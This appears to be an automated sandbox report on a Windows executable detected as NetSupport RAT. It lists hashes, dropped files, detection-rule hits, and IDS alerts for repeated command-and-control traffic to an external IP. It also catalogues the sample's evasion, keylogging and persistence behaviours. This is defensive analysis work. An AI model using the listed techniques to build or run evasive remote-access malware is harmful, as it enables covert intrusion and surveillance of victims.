Edit tour

Windows Analysis Report
hkpqXovZtS.exe

Overview

General Information

Sample name:	hkpqXovZtS.exe renamed because original name is a hash value
Original sample name:	197c2d218121ff0ec738f5d301bf13b7824320c07942b99c9f278e8d7508b15d.exe
Analysis ID:	1546938
MD5:	885a317f0e6471b48210a165fa878af7
SHA1:	0beccc1ab4baa6ae9c9a735ecc0719b75031c394
SHA256:	197c2d218121ff0ec738f5d301bf13b7824320c07942b99c9f278e8d7508b15d
Tags:	exenetsupportuser-JAMESWT_MHT
Infos:

Detection

NetSupport RAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

AI detected suspicious sample

Checks if the current machine is a virtual machine (disk enumeration)

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Contains functionalty to change the wallpaper

Delayed program exit found

Machine Learning detection for sample

Query firmware table information (likely to detect VMs)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect virtualization through RDTSC time measurements

Uses known network protocols on non-standard ports

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Contains functionality to communicate with device drivers

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to detect virtual machines (SGDT)

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Enables security privileges

Extensive use of GetProcAddress (often used to hide API calls)

File is packed with WinRar

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

Found evasive API chain (date check)

Found evasive API chain checking for process token information

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Potential key logger detected (key state polling based)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Startup Folder File Write

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Keylogger Generic

Yara detected NetSupport remote tool

Classification

Process Tree

System is w10x64

hkpqXovZtS.exe (PID: 6968 cmdline: "C:\Users\user\Desktop\hkpqXovZtS.exe" MD5: 885A317F0E6471B48210A165FA878AF7)

client32.exe (PID: 6276 cmdline: "C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe" MD5: F76954B68CC390F8009F1A052283A740)

client32.exe (PID: 7496 cmdline: "C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe" MD5: F76954B68CC390F8009F1A052283A740)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author
C:\Users\user\AppData\Roaming\SuportUpWin\pcicapi.dll	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Roaming\SuportUpWin\client32.exe	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Roaming\SuportUpWin\PCICHEK.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Roaming\SuportUpWin\AudioCapture.dll	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Roaming\SuportUpWin\HTCTL32.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Roaming\SuportUpWin\TCCTL32.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
C:\Users\user\AppData\Roaming\SuportUpWin\PCICL32.DLL	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
C:\Users\user\AppData\Roaming\SuportUpWin\PCICL32.DLL	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Click to see the 3 entries

Memory Dumps

Source	Rule	Description	Author
0000000B.00000000.1370270714.0000000000652000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000003.00000002.3711137674.000000006E8F0000.00000002.00000001.01000000.0000000C.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000003.00000002.3710626041.0000000011194000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
0000000B.00000002.1372118588.00000000111E2000.00000004.00000001.01000000.00000008.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000003.00000002.3709073509.0000000002FB7000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000003.00000002.3698855636.0000000000652000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000000.00000003.1261181102.0000000006571000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
0000000B.00000002.1371512576.0000000000652000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000003.00000000.1266608605.0000000000652000.00000002.00000001.01000000.00000007.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000003.00000002.3710660898.00000000111E2000.00000004.00000001.01000000.00000008.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
0000000B.00000002.1372082359.0000000011194000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0000000B.00000002.1372082359.0000000011194000.00000002.00000001.01000000.00000008.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000000.00000003.1261181102.00000000066FF000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000003.00000002.3710467122.0000000005C50000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
00000003.00000003.1569570475.0000000005C50000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Process Memory Space: hkpqXovZtS.exe PID: 6968	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: hkpqXovZtS.exe PID: 6968	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Process Memory Space: client32.exe PID: 6276	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: client32.exe PID: 6276	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Process Memory Space: client32.exe PID: 7496	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: client32.exe PID: 7496	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author
3.0.client32.exe.650000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
11.0.client32.exe.650000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
11.2.client32.exe.650000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
3.2.client32.exe.70220000.5.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
3.2.client32.exe.650000.0.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
11.2.client32.exe.70230000.5.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
11.2.client32.exe.70220000.4.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
3.2.client32.exe.70230000.6.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
11.2.client32.exe.111b8c68.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
11.2.client32.exe.111b8c68.2.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
3.2.client32.exe.111b8c68.2.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
3.2.client32.exe.111b8c68.2.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
3.2.client32.exe.6e8b0000.4.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
0.3.hkpqXovZtS.exe.6728888.0.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
0.3.hkpqXovZtS.exe.6728888.0.raw.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
3.2.client32.exe.11000000.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
3.2.client32.exe.11000000.1.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
11.2.client32.exe.11000000.1.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
11.2.client32.exe.11000000.1.unpack	JoeSecurity_NetSupport	Yara detected NetSupport remote tool	Joe Security
Click to see the 14 entries

Sigma Signatures

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\hkpqXovZtS.exe, ProcessId: 6968, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Suricata Signatures

ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-01T18:11:20.661224+0100	2022930	1	A Network Trojan was detected	52.149.20.212	443	192.168.2.7	49728	TCP
2024-11-01T18:11:58.977593+0100	2022930	1	A Network Trojan was detected	52.149.20.212	443	192.168.2.7	49939	TCP

ET MALWARE NetSupport RAT with System Information

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-01T18:11:14.216055+0100	2035894	1	A Network Trojan was detected	192.168.2.7	49700	51.89.111.5	1771	TCP
2024-11-01T18:12:07.565835+0100	2035894	1	A Network Trojan was detected	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:46.984057+0100	2035894	1	A Network Trojan was detected	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:13:26.320009+0100	2035894	1	A Network Trojan was detected	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:14:05.559579+0100	2035894	1	A Network Trojan was detected	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:44.518406+0100	2035894	1	A Network Trojan was detected	192.168.2.7	49977	51.89.111.5	1771	TCP

ETPRO MALWARE NetSupport RAT CnC Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-01T18:10:56.289168+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:10:56.289168+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:10:56.289168+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:10:56.289168+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:10:56.289168+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:10:56.289168+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49977	51.89.111.5	1771	TCP
2024-11-01T18:11:10.929682+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49700	51.89.111.5	1771	TCP
2024-11-01T18:11:14.216055+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49700	51.89.111.5	1771	TCP
2024-11-01T18:12:07.062631+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:07.565835+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:07.767876+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:07.767876+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:07.867640+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:07.968070+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:08.068759+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:08.169633+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:08.270929+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:08.370931+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:08.471610+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:08.572648+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:08.673635+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:08.774613+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:08.874878+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:08.974635+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:09.075635+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:09.176647+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:09.281072+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:09.381700+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:09.482636+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:09.583617+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:09.684640+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:09.884648+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:09.884648+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:09.984805+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:10.085640+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:10.185730+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:10.286663+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:10.387662+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:10.488637+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:10.503174+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49965	51.89.111.5	1771	TCP
2024-11-01T18:12:46.884070+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:46.984057+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:47.084059+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:47.181870+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:47.284069+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:47.382839+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:47.484065+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:47.583844+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:47.683820+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:47.784828+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:47.884865+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:47.986231+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:48.086827+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:48.186857+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:48.287546+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:48.438872+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:48.644080+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:48.748062+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:48.848055+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:48.946839+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:49.048062+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:49.147854+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:49.247879+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:49.348827+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:49.452077+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:49.552058+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:49.649971+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:49.750839+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:49.850879+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:49.950876+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:50.051860+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:50.152877+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:50.252845+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:12:50.312288+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49974	51.89.111.5	1771	TCP
2024-11-01T18:13:26.220183+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:26.320009+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:26.420967+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:26.722291+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:26.722291+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:26.722291+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:26.822995+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:26.923019+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:27.026395+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:27.126444+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:27.228177+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:27.325031+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:27.427469+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:27.526014+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:27.627710+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:27.727121+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:27.827020+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:27.928113+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:28.028118+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:28.128063+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:28.229211+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:28.329231+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:28.430009+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:28.531013+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:28.631998+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:28.936158+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:28.936158+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:28.936158+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:29.033039+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:29.136151+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:29.235748+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:29.336150+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:29.436163+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:29.537658+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:29.637008+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:13:29.652239+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49975	51.89.111.5	1771	TCP
2024-11-01T18:14:05.454813+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:05.559579+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:05.660267+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:05.764251+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:05.861252+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:05.961321+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:06.062231+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:06.163278+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:06.264304+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:06.364287+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:06.465251+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:06.566242+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:06.667351+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:06.767239+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:06.868263+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:06.968458+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:07.068252+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:07.169225+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:07.270236+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:07.370240+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:07.470239+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49976	51.89.111.5	1771	TCP
2024-11-01T18:14:07.570283+0100	2827745	1	Malware Command and Control Activity Detected	192.168.2.7	49976	51.89.111.5	1771	TCP
